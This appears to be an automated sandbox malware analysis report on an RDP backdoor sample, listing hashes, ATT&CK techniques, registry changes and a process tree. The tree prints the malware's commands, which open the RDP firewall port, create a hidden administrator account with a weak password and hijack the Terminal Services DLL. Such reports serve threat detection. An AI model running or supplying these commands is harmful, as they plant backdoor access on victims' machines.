Overview
overview
10Static
static
3a9f05c13d7...18.exe
windows7-x64
10a9f05c13d7...18.exe
windows10-2004-x64
10$PLUGINSDI...st.dll
windows7-x64
3$PLUGINSDI...st.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$PLUGINSDI...ss.dll
windows7-x64
3$PLUGINSDI...ss.dll
windows10-2004-x64
3$PLUGINSDI...ry.dll
windows7-x64
3$PLUGINSDI...ry.dll
windows10-2004-x64
3$TEMP/RDP_5166.exe
windows7-x64
9$TEMP/RDP_5166.exe
windows10-2004-x64
9$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$TEMP/SETUP_73538.exe
windows7-x64
3$TEMP/SETUP_73538.exe
windows10-2004-x64
3$_1_/abashed.exe
windows7-x64
10$_1_/abashed.exe
windows10-2004-x64
10$_1_/libeay32.dll
windows7-x64
3$_1_/libeay32.dll
windows10-2004-x64
3$_1_/ssleay32.dll
windows7-x64
3$_1_/ssleay32.dll
windows10-2004-x64
3Analysis
-
max time kernel
135s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/NSISList.dll
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/NSISList.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win7-20240705-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/registry.dll
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/registry.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
$TEMP/RDP_5166.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
$TEMP/RDP_5166.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
$TEMP/SETUP_73538.exe
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
$TEMP/SETUP_73538.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
$_1_/abashed.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
$_1_/abashed.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
$_1_/libeay32.dll
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
$_1_/libeay32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
$_1_/ssleay32.dll
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
$_1_/ssleay32.dll
Resource
win10v2004-20240802-en
General
-
Target
$TEMP/RDP_5166.exe
-
Size
569KB
-
MD5
a46ab91afbba2a657bce8e961bf2632f
-
SHA1
7c1a484a381fc4915c6904358f7a3611ad9323d2
-
SHA256
740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1
-
SHA512
a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4
-
SSDEEP
12288:8W7IR23s4x7/6GDG9e9WJX08vV0CjUsZl4VXqnxq:h7J5D6GDGc9WJk8d0wLIaq
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 2684 cmd.exe 5020 net1.exe 2680 net.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 3312 netsh.exe 4356 netsh.exe 1688 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Icosahedron\\disavow.dll" SETUP_73538.exe -
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" RDP_5166.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation RDP_5166.exe -
Executes dropped EXE 1 IoCs
pid Process 2824 SETUP_73538.exe -
Loads dropped DLL 6 IoCs
pid Process 4556 RDP_5166.exe 4556 RDP_5166.exe 4556 RDP_5166.exe 4556 RDP_5166.exe 4556 RDP_5166.exe 1036 svchost.exe -
Modifies WinLogon 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList RDP_5166.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts RDP_5166.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" RDP_5166.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" SETUP_73538.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\rfxvmt.dll SETUP_73538.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" RDP_5166.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Icosahedron\disavow.ini SETUP_73538.exe File created C:\Program Files\Icosahedron\disavow.dll SETUP_73538.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDP_5166.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SETUP_73538.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1036 svchost.exe 1036 svchost.exe 1036 svchost.exe 1036 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2824 SETUP_73538.exe Token: SeAuditPrivilege 1036 svchost.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 4556 wrote to memory of 2824 4556 RDP_5166.exe 93 PID 4556 wrote to memory of 2824 4556 RDP_5166.exe 93 PID 4556 wrote to memory of 2824 4556 RDP_5166.exe 93 PID 4556 wrote to memory of 4576 4556 RDP_5166.exe 95 PID 4556 wrote to memory of 4576 4556 RDP_5166.exe 95 PID 4556 wrote to memory of 4576 4556 RDP_5166.exe 95 PID 4576 wrote to memory of 4356 4576 cmd.exe 97 PID 4576 wrote to memory of 4356 4576 cmd.exe 97 PID 4576 wrote to memory of 4356 4576 cmd.exe 97 PID 4556 wrote to memory of 1636 4556 RDP_5166.exe 100 PID 4556 wrote to memory of 1636 4556 RDP_5166.exe 100 PID 4556 wrote to memory of 1636 4556 RDP_5166.exe 100 PID 1636 wrote to memory of 1688 1636 cmd.exe 102 PID 1636 wrote to memory of 1688 1636 cmd.exe 102 PID 1636 wrote to memory of 1688 1636 cmd.exe 102 PID 4556 wrote to memory of 4640 4556 RDP_5166.exe 103 PID 4556 wrote to memory of 4640 4556 RDP_5166.exe 103 PID 4556 wrote to memory of 4640 4556 RDP_5166.exe 103 PID 4640 wrote to memory of 3288 4640 cmd.exe 105 PID 4640 wrote to memory of 3288 4640 cmd.exe 105 PID 4640 wrote to memory of 3288 4640 cmd.exe 105 PID 3288 wrote to memory of 2788 3288 net.exe 106 PID 3288 wrote to memory of 2788 3288 net.exe 106 PID 3288 wrote to memory of 2788 3288 net.exe 106 PID 4556 wrote to memory of 2684 4556 RDP_5166.exe 107 PID 4556 wrote to memory of 2684 4556 RDP_5166.exe 107 PID 4556 wrote to memory of 2684 4556 RDP_5166.exe 107 PID 2684 wrote to memory of 888 2684 cmd.exe 109 PID 2684 wrote to memory of 888 2684 cmd.exe 109 PID 2684 wrote to memory of 888 2684 cmd.exe 109 PID 888 wrote to memory of 2556 888 net.exe 110 PID 888 wrote to memory of 2556 888 net.exe 110 PID 888 wrote to memory of 2556 888 net.exe 110 PID 2684 wrote to memory of 2680 2684 cmd.exe 111 PID 2684 wrote to memory of 2680 2684 cmd.exe 111 PID 2684 wrote to memory of 2680 2684 cmd.exe 111 PID 2680 wrote to memory of 5020 2680 net.exe 112 PID 2680 wrote to memory of 5020 2680 net.exe 112 PID 2680 wrote to memory of 5020 2680 net.exe 112 PID 2824 wrote to memory of 3312 2824 SETUP_73538.exe 114 PID 2824 wrote to memory of 3312 2824 SETUP_73538.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"1⤵
- Allows Network login with blank passwords
- Checks computer location settings
- Loads dropped DLL
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe"C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i2⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3312
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4356
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\net.exenet user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never4⤵
- System Location Discovery: System Language Discovery
PID:2788
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add2⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" "wgautilacc" /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add4⤵
- System Location Discovery: System Language Discovery
PID:2556
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" "wgautilacc" /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5020
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:1516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1292,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:81⤵PID:4312
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Users
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Discovery
Permission Groups Discovery
1Local Groups
1Query Registry
1System Information Discovery
2System Location Discovery
1System Language Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD59adce164113ec09d243a78029aecfa2e
SHA1403fb3148345800ca6f0374459e3f6d5ef3b613e
SHA256d577804cf39a7af100747f2dcc00c525a19fa3cb0498885d020cc2a0f10a9436
SHA512c938ccc8b89181e2d5113f31e4adc532b0c62793ba3549dbc7ece22a30219d4f0885e89b1ac01499bed5ea1dd653cbee3b61bdb0883d9980ea4c518ac70b01f5
-
Filesize
11KB
MD50063d48afe5a0cdc02833145667b6641
SHA1e7eb614805d183ecb1127c62decb1a6be1b4f7a8
SHA256ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7
SHA51271cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0
-
Filesize
6KB
MD5293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
Filesize
102KB
MD5de5ab87a7fcc1d9225feed2185fa0d08
SHA19184073717812324999601bf3dbfa89c52f2ce4d
SHA25654fa75eadbadd1c86ca950ae93b70e5512dea629d103fdf5eaa1b070a32068ac
SHA512226819782e68b051003f7f47b4e1d5a6b6d52713ee4bff6f740fbc356793d8e526663c7c51f230b44ac04449e4ca79c28a8454f20badf3f322d8f7a40c87851f
-
Filesize
181KB
MD51d63f27fe33bcf7795ffbee0576d76aa
SHA16f3c71f8ecd983d54502798c190e02ebf5e6a1e4
SHA25657d03a2a794019bea83f1e866c83ea48db91feb2599036435db291e098f7ff7a
SHA512871906a16812dc05ba75208e2ef84838f003bc082c9d27e12783e97a18a8cd96daecb5cae92f4429df74414cd203e522ec6749ce4c9d8a130e9fa35c782e3a78